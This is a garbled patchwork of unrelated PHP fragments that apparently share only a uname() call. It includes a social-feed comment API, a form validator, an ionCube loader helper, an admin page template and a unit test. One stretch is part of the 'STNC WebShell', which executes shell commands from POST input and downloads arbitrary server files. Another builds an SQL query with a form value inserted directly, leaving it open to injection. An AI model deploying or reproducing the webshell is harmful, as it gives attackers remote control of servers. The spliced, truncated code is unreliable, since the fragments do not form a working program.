/**
* 为Feed添加评论
*
*
* @param string token , 必填
* @param string fid - 必填
* @param string text - 必填
* @return feed array
* @author EasyChen
*/
public function feed_add_comment($text = false, $fid = false)
{
if (!$text) {
$content = $text = z(t(v('text')));
}
if (!not_empty($content)) {
return self::send_error(LR_API_ARGS_ERROR, __('INPUT_CHECK_BAD_ARGS', 'TEXT'));
}
if (!$fid) {
$fid = intval(v('fid'));
}
if (intval($fid) < 1) {
return self::send_error(LR_API_ARGS_ERROR, __('INPUT_CHECK_BAD_ARGS', 'FID'));
}
$finfo = get_line("SELECT * FROM `feed` WHERE `id` = '" . intval($fid) . "' LIMIT 1");
if (is_mobile_request()) {
$device = 'mobile';
} else {
$device = 'web';
}
$sql = "INSERT INTO `comment` ( `fid` , `uid` , `content` , `timeline` , `device` ) \n\t\tVALUES ( '" . intval($fid) . "' , '" . intval($_SESSION['uid']) . "' , '" . s($content) . "' , NOW() , '" . s($device) . "' ) ";
run_sql($sql);
if (db_errno() != 0) {
return self::send_error(LR_API_DB_ERROR, __('API_MESSAGE_DATABASE_ERROR') . mysql_error());
} else {
$lid = last_id();
// feed表comment_count计数增加
$count = get_var("SELECT COUNT(*) FROM `comment` WHERE `fid` = '" . intval($fid) . "' ", db());
$sql = "UPDATE `feed` SET `comment_count` = '" . intval($count) . "' WHERE `id` = '" . intval($fid) . "' LIMIT 1";
run_sql($sql);
// 向Feed作者发通知
if ($finfo['uid'] != uid()) {
send_notice($finfo['uid'], __('API_TEXT_COMMENT_FEED_OWNED', array(uname(), $finfo['content'], $content)), 2, array('fid' => intval($fid), 'count' => $count));
}
// 向参与了该Feed讨论的同学发送通知
$sql = "SELECT `uid` FROM `comment` WHERE `fid`= '" . intval($fid) . "' ";
if ($uitems = get_data($sql)) {
foreach ($uitems as $uitem) {
if ($uitem['uid'] != uid() && $uitem['uid'] != $finfo['uid']) {
$myuids[] = $uitem['uid'];
}
}
}
if (isset($myuids)) {
$myuids = array_unique($myuids);
foreach ($myuids as $muid) {
send_notice($muid, __('API_TEXT_COMMENT_FEED_IN', array(uname(), $finfo['content'], $content)), 2, array('fid' => intval($fid), 'count' => $count));
}
}
// 向被@的同学,发送通知
if ($ats = find_at($content)) {
$sql = "SELECT `id` FROM `user` WHERE ";
foreach ($ats as $at) {
$at = z(t($at));
if ($gname = get_group_names()) {
if (in_array(strtoupper($at), $gname)) {
if ($ndata = get_group_unames($at)) {
foreach ($ndata as $nname) {
$names[] = $nname;
}
}
} else {
$names[] = $at;
}
} else {
$names[] = $at;
}
}
foreach ($names as $at) {
$at = z(t($at));
if (mb_strlen($at, 'UTF-8') < 2) {
continue;
}
$wsql[] = " `name` = '" . s(t($at)) . "' ";
if (c('at_short_name')) {
if (mb_strlen($at, 'UTF-8') == 2) {
$wsql[] = " `name` LIKE '_" . s($at) . "' ";
}
}
}
if (isset($wsql) && is_array($wsql)) {
$sql = $sql . join(' OR ', $wsql);
if ($udata = get_data($sql)) {
foreach ($udata as $uitem) {
$myuids[] = $uitem['id'];
}
if (isset($myuids) && is_array($myuids)) {
$myuids = array_unique($myuids);
foreach ($myuids as $muid) {
if ($muid != uid() && $muid != $finfo['uid']) {
send_notice($muid, __('API_TEXT_AT_IN_CAST_COMMENT', array(uname(), $finfo['content'], $content)), 2, array('fid' => intval($fid), $count));
}
}
}
}
}
}
if ($comment = get_line("SELECT * FROM `comment` WHERE `id` = '" . intval($lid) . "' LIMIT 1", db())) {
$comment['user'] = get_user_info_by_id($_SESSION['uid']);
return self::send_result($comment);
} else {
if (db_errno() != 0) {
return self::send_error(LR_API_DB_ERROR, __('API_MESSAGE_DATABASE_ERROR') . mysql_error());
} else {
return self::send_error(LR_API_DB_EMPTY_RESULT, __('API_MESSAGE_EMPTY_RESULT_DATA'));
}
}
}
}
return false;
}
return true;
}
//Validate dob
function ucountry($value)
{
return $value != '';
}
//Sanatise ALL the Data :D
$i_uname = $sanitiser->sanitise($_POST["uname"]);
$i_uwebsite = $sanitiser->sanitise($_POST["uweb"]);
$i_ucountry = $sanitiser->sanitise($_POST["pcountry"]);
//Start Validating :D
$valid = true;
$valid = uname($i_uname) && $valid;
$valid = uwebsite($i_uwebsite) && $valid;
$valid = ucountry($i_ucountry) && $valid;
if (!$valid) {
header("location:create_university.php?errors={$errors}");
die;
} else {
//check if the university already exist
$email = $_SESSION['username'];
include_once "settings.php";
$conn = mysqli_connect($host, $user, $pwd, $sql_db);
if (!$conn) {
header("location:error.php?type=database");
die;
}
$query = "SELECT * FROM University WHERE Website = '{$i_uwebsite}';";
function get_loader_name()
{
$u = uname();
$sys = get_sysinfo();
$os = substr($u, 0, strpos($u, ' '));
$os_key = strtolower(substr($u, 0, 3));
$php_version = phpversion();
$php_family = substr($php_version, 0, 3);
$loader_sfix = $os_key == 'win' ? '.dll' : ($sys['THREAD_SAFE'] ? '_ts.so' : '.so');
$loader_name = "ioncube_loader_{$os_key}_{$php_family}{$loader_sfix}";
return $loader_name;
}
<script type="text/javascript" src="<?php
echo js();
?>
head.load.min.js"></script>
</head>
<body class="bg_c sidebar fixed">
<div id="top_bar">
<div class="wrapper cf">
<ul class="fl">
<li class="sep"><?php
echo lang('welcome');
?>
<a href="#"><?php
echo uname();
?>
</a></li>
<li class="sep"><a href="<?php
echo site_url('auth/logout');
?>
"><?php
echo lang('logout');
?>
</a></li>
<li><a target="_blank" href="<?php
echo site_url();
?>
"><?php
echo lang('front_end_preview');
?>
$location = getcwd();
if ($action === "download" && isset($_POST["fname"])) {
$fname = $_POST["fname"];
if (file_exists($fname)) {
$pathinfo = pathinfo($fname);
header("Content-Transfer-Encoding: binary");
header("Content-type: application/x-download");
header("Content-Length: " . filesize($fname));
header("Content-Disposition: attachment; filename=" . $pathinfo["basename"]);
readfile($fname);
die;
} else {
$printline = "\"{$fname}\" - download failed.";
}
}
echo "<head><style>input {border: black 1px solid; background-color: #dfdfdf; font: 8pt verdana;}\ntextarea {background-color:#dfdfdf; scrollbar-face-color: #dfdfdf; scrollbar-highlight-color: #dfdfdf;\nscrollbar-shadow-color: #dfdfdf; scrollbar-3dlight-color: #dfdfdf; scrollbar-arrow-color: #dfdfdf; scrollbar-track-color: #dfdfdf;\nscrollbar-darkshadow-color: #dfdfdf; border: black 1px solid; font: fixedsys bold; }\ntd {padding:0;} body {margin: 0; padding: 0; background-color: #cfcfcf;} a {color:black;text-decoration:none;}\n.btn {background-color: #cfcfcf;} .pad {padding:5;}\n</style><title> STNC WebShell v{$version} </title></head><body><table width=100%>\n<tr><td {$hsplit}><table><tr><td {$vsplit}><b> STNC WebShell v{$version} </b></td><td>id: " . id() . "<br>uname: " . uname() . "<br>your ip: " . $_SERVER["REMOTE_ADDR"] . " - server ip: " . gethostbyname($_SERVER["HTTP_HOST"]) . " - safe_mode: " . (safe_mode_is_on() ? "on" : "off") . "</td></tr></table></tr></td>\n<tr><form method=post><td class=\"pad\" colspan=2 {$hsplit}><center>" . hidden("action", "save") . hidden_pwd() . "<textarea cols=120 rows=16 wrap=off name=data>";
echo htmlspecialchars($printline) . "\n";
if ($action === "cmd") {
if (isset($_POST["cmd"])) {
$cmd = $_POST["cmd"];
} else {
$cmd = "ls -la";
}
$result = htmlspecialchars(cmd($cmd));
if ($result === "") {
$result = cmd("ls -la");
}
echo $result;
$location = getcwd();
} elseif ($action === "edit" && isset($_POST["fname"])) {
$fname = $_POST["fname"];
public function test_uname()
{
@session_start();
$_SESSION['uname'] = 'easychen';
$this->assertEqual(uname(), 'easychen');
}
